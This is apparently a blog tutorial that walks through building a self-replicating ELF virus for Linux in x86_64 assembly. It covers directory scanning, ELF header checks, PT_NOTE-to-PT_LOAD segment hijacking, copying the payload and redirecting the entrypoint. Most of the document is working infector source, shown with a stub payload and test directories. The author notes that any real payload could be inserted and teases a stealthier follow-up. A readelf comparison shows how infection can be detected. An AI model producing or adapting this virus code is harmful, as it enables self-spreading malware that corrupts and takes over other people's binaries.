Infectors: how to make a simple self-replicating program on Linux.

Introduction⌗

During this post, we will learn how to code a simple ELF infector on Linux. This infector will spread and sel-replicate inside the other binaries that it finds. It will get executed when infected binaries are launched so that it can spread even more. The payload will be harmless, just a signature to attest that the binary has been infected. This infector will be very basic and undisguised at all, any reverse-engineer could see that a file has been infected by executing a simple readelf command (We will get more into that later).

You can check the full source code here

How does it work ?⌗

The technique that we will use here is called PT_NOTE segment hijacking. To understand how it works, we first need to understand the ELF format. The first element of an ELF file is the ELF header, it gives us the info we need to understand and read the rest of the file. Then comes the Program Header table, it will describe how the file is being organized. Each program header describes a part of the file, a part can belong to several program headers. Each entry is described by the following C structure (man elf for more information).

 typedef struct {
               uint32_t   p_type;
               uint32_t   p_flags;
               Elf64_Off  p_offset;
               Elf64_Addr p_vaddr;
               Elf64_Addr p_paddr;
               uint64_t   p_filesz;
               uint64_t   p_memsz;
               uint64_t   p_align;
           } Elf64_Phdr;

The p_type field describes what kind of program header it is. There are two types that interests us :

PT_LOAD: The array element specifies a loadable segment, described by p_filesz and p_memsz. The bytes from the file are mapped to the beginning of the memory segment. If the segment's memory size p_memsz is larger than the file size p_filesz, the "extra" bytes are defined to hold the value 0 and to follow the segment's initialized area. The file size may not be larger than the memory size. Loadable segment entries in the program header table appear in ascending order, sorted on the p_vaddr member.
PT_NOTE: The array element specifies the location of notes (ElfN_Nhdr).

The PT_LOAD are being loaded in memory which means that with the right permissions, we can execute the content of it. The PT_NOTE simply gives the location of notes that are useless for the program during its execution. There should be a PT_NOTE segment on every binary compiled the usual way. The technique will consists in changing this PT_NOTE segment to a PT_LOAD pointing to the end of the file where we will put our code. This way, it will be mapped into memory without altering the file too much and we will be able to execute it.

To execute it, we will look a bit more at the ELF header structure defined as

#define EI_NIDENT 16

           typedef struct {
               unsigned char e_ident[EI_NIDENT];
               uint16_t      e_type;
               uint16_t      e_machine;
               uint32_t      e_version;
               ElfN_Addr     e_entry;
               ElfN_Off      e_phoff;
               ElfN_Off      e_shoff;
               uint32_t      e_flags;
               uint16_t      e_ehsize;
               uint16_t      e_phentsize;
               uint16_t      e_phnum;
               uint16_t      e_shentsize;
               uint16_t      e_shnum;
               uint16_t      e_shstrndx;
           } ElfN_Ehdr;

The field that interests us here is e_entry which will define the entrypoint of our program. If we put our code, the program will execute it and we will just have to transfer the execution back to the original entrypoint so that the program can keep its course.

The code⌗

Filesystem reading⌗

The first thing to do will be finding files to infect. For safety reason and because we don’t want to launch our program as root, we will not look for those in /bin or /usr/bin but in /tmp/test and /tmp/test2.

_start:
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x10
    lea     rdi, [rel cwd]
    mov     rsi, O_DIRECTORY | O_RDONLY
    xor     eax, eax
    add     al, SYS_OPEN
    syscall
    mov     [rsp], eax      ; We open and save the fd of the cwd so that we will be able
                            ; to chdir back to it after we are don

    lea     rdi, [rel dir1] ; /tmp/test
    call    readdir
    lea     rdi, [rel dir2] ; /tmp/test2
    call    readdir

    mov     edi, [rsp]
    xor     eax, eax
    add     al, SYS_FCHDIR
    syscall                 ; Back to our initial cwd to not break the executed binary (eg. ls)
    mov     edi, [rsp]
    xor     eax, eax
    add     eax, SYS_CLOSE
    syscall

    leave

This code chunk will allow us to call the readdir function that we will use to run through files in both of the target directories. To use those files then, we want to open them with relative paths to avoid string operations that are a bit painful in ASM so we will use chdir to open them directly. Our first step to avoid breaking the infected program (eg ls) will be to open our current working directory to be able to get back to it once the job is done.

readdir:
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x20
    mov     eax, SYS_CHDIR  ; Let's change the directory to open file,
                            ; string operations are painful in ASM so relative paths will do
    syscall

    mov     rsi, O_DIRECTORY | O_RDONLY
    xor     eax, eax
    add     eax, SYS_OPEN
    syscall
    mov     [rsp], eax

    xor     rdi, rdi
    mov     rsi, 0x1000
    add     rdx, PROT_READ | PROT_WRITE
    mov     r10, MAP_ANONYMOUS | MAP_PRIVATE
    xor     r8, r8
    dec     r8
    xor     r9, r9
    xor     eax, eax
    add     al, SYS_MMAP
    syscall                 ; We map a page for the getdents buffer

    test    al, al
    jnz     end_readdir
    mov     [rsp + 0x8], rax

loop_dir:
    mov     edi, [rsp]
    mov     rsi, [rsp + 0x8]
    mov     rdx, DIRENT_MAX_SIZE
    xor     eax, eax
    add     al, SYS_GETDENTS64
    syscall
    cmp     eax, 0

    jle     end_readdir
    mov     [rsp + 0x4], eax
    xor     r8, r8

loop_buf_dirent:
    mov     [rsp + 0x10], r8w
    mov     r9, [rsp + 0x8]
    cmp     BYTE [r9 + r8 + d_type], DT_REG
    jne     next_dirent
    lea     rdi, [r9 + r8 + d_name]
    call    infect          ; We only infect regular files 

next_dirent:
    mov     r9, [rsp + 0x8]
    movzx   r8, WORD [rsp + 0x10]
    add     r8w, [r9 + r8 + d_reclen]
    cmp     r8w, [rsp + 4]
    jl      loop_buf_dirent
    jmp     loop_dir

end_readdir:
    mov     edi, [rsp]
    xor     eax, eax
    add     eax, SYS_CLOSE
    syscall

    mov     rdi, [rsp + 0x8]
    mov     rsi, 0x1000
    mov     eax, SYS_MUNMAP
    syscall
    leave
    ret

With the readdir function, we will loop through all the linux_dirent64 structures present in each of the target directories. If the current structure describes a regular file, we will call the infect function with its name as argument to try to infect it.

Preliminary checks⌗

The infect function will be the main function of our program. To make the code more clean, I’ve defined a structure called Infection_struct in defines.s that will allow me, by considering the stack frame as this structure to use its fields as local variable names.

infect:
    push    rbp
    mov     rbp, rsp
    sub     rsp, INFECTOR_STRUCT_SIZE

    mov     esi, O_RDWR
    mov     eax, SYS_OPEN
    syscall
    cmp     eax, 0
    jl      quit_infect

    mov     [rsp + inf_fd], eax
    mov     edi, [rsp + inf_fd]
    lea     rsi, [rsp + inf_elfhdr]
    mov     rdx, ELFHDR_SIZE
    mov     eax, SYS_READ
    syscall

    lea     rbx, [rsp + inf_elfhdr]
    lea     rax, [rbx + e_ident]
    cmp     [rax], DWORD ELF_MAGIC
    jne     close_quit_infect
    cmp     [rax + EI_CLASS], BYTE ELFCLASS64
    jne     close_quit_infect
    cmp     [rax + EI_DATA], BYTE ELFDATA2LSB       ; Only ELF 64 bits are being taken into account
    jne     close_quit_infect
    cmp     [rax + EI_PAD], DWORD INFECTION_MAGIC   ; We check them to avoid double infection
    je      close_quit_infect

    mov     rdx, [rax + e_phnum]
    test    rdx, rdx
    je      close_quit_infect
    mov     ax, [rbx + e_type]
    cmp     ax, ET_EXEC
    je      right_type_check
    cmp     ax, ET_DYN
    jne     close_quit_infect

The first part of this function is just about parsing the ELF header to check for several things:

The file is a valid ELF file
It is either an executable file or a shared object file
It has not been infected yet

Since it is useless and memory-consuming to reinfect a file, we will prevent that to append. In the e_ident field of the ELF header, there are some padding bytes that are unused and zero-filled. We will put an infection marker here to keep track of the already infected binaries.

right_type_check:
    mov     edi, [rsp + inf_fd]
    xor     rsi, rsi
    mov     rdx, SEEK_END
    mov     eax, SYS_LSEEK
    syscall
    mov     [rsp + inf_filesize], rax

    mov     rsi, rax
    xor     rdi, rdi
    mov     rdx, PROT_READ | PROT_WRITE
    mov     r10, MAP_SHARED
    mov     r8d, [rsp + inf_fd]
    xor     r9, r9
    mov     eax, SYS_MMAP
    syscall                     ; We map the file into memory to operate on it
    test    al, al

    jnz     close_quit_infect
    mov     [rsp + inf_map], rax

    mov     [rax + e_ident + EI_PAD], DWORD INFECTION_MAGIC ; Mark binary for infection
    mov     QWORD [rsp + inf_notehdr], 0

    mov     r8, rax
    add     r8, [rax + e_phoff]
    movzx   rcx, WORD [rax + e_phnum]
loop_phdrs:
    cmp     [r8 + p_type], DWORD PT_NOTE
    jne     cmp_load_phdr
    mov     QWORD [rsp + inf_notehdr], r8
cmp_load_phdr:
    cmp     [r8 + p_type], DWORD PT_LOAD
    jne     next_phdr
    mov     QWORD [rsp + inf_last_pt_load], r8
next_phdr:
    add     r8w, [rax + e_phentsize]
    loop    loop_phdrs

check_if_note_exists:
    mov     rax, [rsp + inf_notehdr]
    test    rax, rax
    jz      munmap_quit_infect

This next code chunk is gonna map the file into memory and get some information that are gonna be useful for the infection routine such as:

the file size
the PT_NOTE phdr address
the last PT_LOAD phdr address

Infection⌗

Once we have every needed information, we can get to the serious part.

patch_note_phdr:
    mov     rax, [rsp + inf_notehdr]
    mov     [rax + p_type], DWORD PT_LOAD       ; We make it loadable
    mov     [rax + p_flags], DWORD PF_R | PF_X  ; And executable
    mov     rdx, QWORD [rsp + inf_filesize]     ; It starts at the EOF
    mov     QWORD [rax + p_offset], rdx
    mov     QWORD [rax + p_filesz], virus_len   ; We update the sizes
    mov     QWORD [rax + p_memsz], virus_len
    mov     QWORD [rax + p_align], 0x1000       ; And the alignement

    mov     rdx, [rsp + inf_last_pt_load]
    mov     rcx, [rdx + p_vaddr]                ; we get the last page used
    and     cx, 0xf000                          ; we align the address on page border
    add     rcx, [rsp + inf_filesize]           ; and we add the file size to it so that
                                                ; it will be on another page and also to keep
                                                ; offset and address consistent

    mov     [rax + p_vaddr], rcx                ; We put it after the last address mapped into memory
    mov     [rax + p_paddr], rcx                ; but we have to align it on another page

    sub     rax, [rsp + inf_map]                ; We convert our infected segment's address to
    mov     [rsp + inf_notehdr], rax            ; an offset in case remapping changes the map address

This is the code that will handle the PT_NOTE hijacking. If we want our program to execute, we need the new PT_LOAD header to be valid so we will have to change a lot of its fields.

p_type: We will switch it from PT_NOTE to PT_LOAD to tell the system that we want to map our code into the memory.
p_flags: For PT_LOAD segments, this field is used to define the permissions that will be granted to our segment. We will give it read and execute permissions because that’s all ot needs.
p_offset: This field defines here the segment starts, since we are gonna put our code at the end of the file, we will put the file size value here.
p_file/memsz: Those are used to tell the system the place it needs to reserve in memory and how many bytes of the file it has to put in. We will define both as the virus length (We will see how to get it later)
p_p/vaddr: Those are the physical and virtual addresses where the segment will be mapped. It is said in the man that Loadable process segments must have congruent values for p_vaddr and p_offset, modulo the page size. so we will take the page right after the last already existing PT_LOAD and then add it the file size so that we are sure that he offset and addresses values have congruent values.
p_align: Loadable segments are aligned on memory pages so we will change it to the usual size of a page (0x1000 bytes)

adjust_file_size:
    mov     edi, [rsp + inf_fd]
    mov     rsi, [rsp + inf_filesize]
    add     rsi, virus_len
    mov     QWORD [rsp + inf_new_filesize], rsi
    mov     eax, SYS_FTRUNCATE
    syscall
    test    eax, eax
    jnz     munmap_quit_infect

    mov     rdi, [rsp + inf_map]
    mov     rsi, [rsp + inf_filesize]
    mov     rdx, [rsp + inf_new_filesize]
    xor     r10, r10
    add     r10b, MREMAP_MAYMOVE
    mov     eax, SYS_MREMAP
    syscall
    test    al, al
    jnz     munmap_quit_infect
    mov     [rsp + inf_map], rax            ; This might break the reference to the phdrs
                                            ; but they are not needed anymore
    mov     rdi, [rsp + inf_map]
    add     rdi, [rsp + inf_filesize]
    lea     rsi, [rel _start]
    mov     rcx, virus_len

copy_payload:
    lodsb
    stosb
    loop    copy_payload

patch_entrypoint:
    mov     r8, [rsp + inf_map]
    mov     rax, r8
    add     rax, [rsp + inf_notehdr]
    mov     rdx, [r8 + e_entry]          ; We save the old entrypoint
    mov     rcx, [rax + p_vaddr]
    mov     QWORD [r8 + e_entry], rcx    ; We change the entrypoint to our code
    add     rcx, final_jmp_offset        ; The address to patch
    sub     rdx, rcx                     ; We have the relative jump
    mov     rcx, [rax + p_offset]
    add     rcx, r8
    add     rcx, final_jmp_offset - 4    ; The file offset of the address to patch
    mov     DWORD [rcx], edx             ; We return to the original entrypoint

munmap_quit_infect:
    mov     rdi, [rsp + inf_map]
    mov     rsi, [rsp + inf_filesize]
    mov     eax, SYS_MSYNC
    syscall

    mov     rdi, [rsp + inf_map]
    mov     rsi, [rsp + inf_filesize]
    mov     eax, SYS_MUNMAP
    syscall

close_quit_infect:
    mov     edi, [rsp + inf_fd]
    mov     eax, SYS_CLOSE
    syscall

quit_infect:
    leave
    ret

    signature: db 0, SIGNATURE, 0
    dir1: db "/tmp/test/", 0
    dir2: db "/tmp/test2/", 0
    cwd: db ".", 0

_end:
    xor     rdi, rdi
    mov     eax, SYS_EXIT
    syscall

Once our new segment has been created, it is time to put the code inside the file. Since we are working with a memory mapped file, we need to remap it to extend it first. Once this has been done, we just go to the previous end of the file and we copy the payload there. To get the size of our payload, we use the _end beacon that we put at the end so that we can define virus_len as _end - _start.

Once our payload has been copied, the last step is to hijack the control flow to get it executed. To do that we will first add the following lines to _start:

    jmp     _end
final_jmp_offset equ $ - _start

With this line, the program will cleanly quits after its first execution. We can also use this jmp to jmp back to the original entrypoint after the virus execution. In x86_64 assembly, a jump is encoded as opcode relative_offset starting from the final_jmp_offset label. We can obtain this offset with the formula : old_entrypoint_address - final_jmp_offset. Once we replaced the jmp address in the copied code, everything is set but there is still one thing to do for the infector to fully work : preserve its registers. Indeed, the host program code might expect some special values in some register that we used (like argc and argv in rdi and rsi) so we will push those important registers at the very beginning of our program and pop them just before the final jump.

Conclusion⌗

We can now infect any ELF 64-bits of our system and get anything executed executed by it if we insert a real payload inside but we have a problem : our technique is not stealthy at all, we can be spotted by readelf.

readelf is a linux command that allows us to inspect ELF files, we will use it with the -l option to display the program headers of a simple Hello World coded in C before and after infection.

Elf file type is DYN (Shared object file)
Entry point 0x1050
There are 11 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
                 0x0000000000000268 0x0000000000000268  R      0x8
  INTERP         0x00000000000002a8 0x00000000000002a8 0x00000000000002a8
                 0x000000000000001c 0x000000000000001c  R      0x1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000560 0x0000000000000560  R      0x1000
  LOAD           0x0000000000001000 0x0000000000001000 0x0000000000001000
                 0x00000000000001bd 0x00000000000001bd  R E    0x1000
  LOAD           0x0000000000002000 0x0000000000002000 0x0000000000002000
                 0x0000000000000158 0x0000000000000158  R      0x1000
  LOAD           0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
                 0x0000000000000248 0x0000000000000250  RW     0x1000
  DYNAMIC        0x0000000000002df8 0x0000000000003df8 0x0000000000003df8
                 0x00000000000001e0 0x00000000000001e0  RW     0x8
  NOTE           0x00000000000002c4 0x00000000000002c4 0x00000000000002c4
                 0x0000000000000044 0x0000000000000044  R      0x4
  GNU_EH_FRAME   0x0000000000002014 0x0000000000002014 0x0000000000002014
                 0x000000000000003c 0x000000000000003c  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
                 0x0000000000000218 0x0000000000000218  R      0x1

This is how a normal file looks like, it has 4 load segments including a single one that is executable for the code and a single one that is writable for the data segment. It also has a NOTE header that is containing notes about the program.

After the infection, it will look more like :

Elf file type is DYN (Shared object file)
Entry point 0x70e0
There are 11 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
                 0x0000000000000268 0x0000000000000268  R      0x8
  INTERP         0x00000000000002a8 0x00000000000002a8 0x00000000000002a8
                 0x000000000000001c 0x000000000000001c  R      0x1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000560 0x0000000000000560  R      0x1000
  LOAD           0x0000000000001000 0x0000000000001000 0x0000000000001000
                 0x00000000000001bd 0x00000000000001bd  R E    0x1000
  LOAD           0x0000000000002000 0x0000000000002000 0x0000000000002000
                 0x0000000000000158 0x0000000000000158  R      0x1000
  LOAD           0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
                 0x0000000000000248 0x0000000000000250  RW     0x1000
  DYNAMIC        0x0000000000002df8 0x0000000000003df8 0x0000000000003df8
                 0x00000000000001e0 0x00000000000001e0  RW     0x8
  LOAD           0x00000000000040e0 0x00000000000070e0 0x00000000000070e0
                 0x000000000000038a 0x000000000000038a  R E    0x1000
  GNU_EH_FRAME   0x0000000000002014 0x0000000000002014 0x0000000000002014
                 0x000000000000003c 0x000000000000003c  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
                 0x0000000000000218 0x0000000000000218  R      0x1

We can now see that there is another load segment which has execution permissions. It is super weird and should not be there at all, we can also notice that obviously, the NOTE segment disappeared. Another odd thing is the fact that the entrypoint is pointing on that segment. The code segment is almost always mapped at 0x1000 and the entrypoint is usually at the beginning of it so 0x70e0 definitely doesn’t look legit. This is how you can see that this file is not legitimate and probably infected without even the need to properly analyze it.

Lucky for us, we are gonna learn how to make an infector that will not induce any peculiar change in the ELF file structure. It will keep the original entrypoint and it will not change the number of load segments nor their permissions.

Part 2. Advanced infectors: How to make our infector stealthy and hardly detectable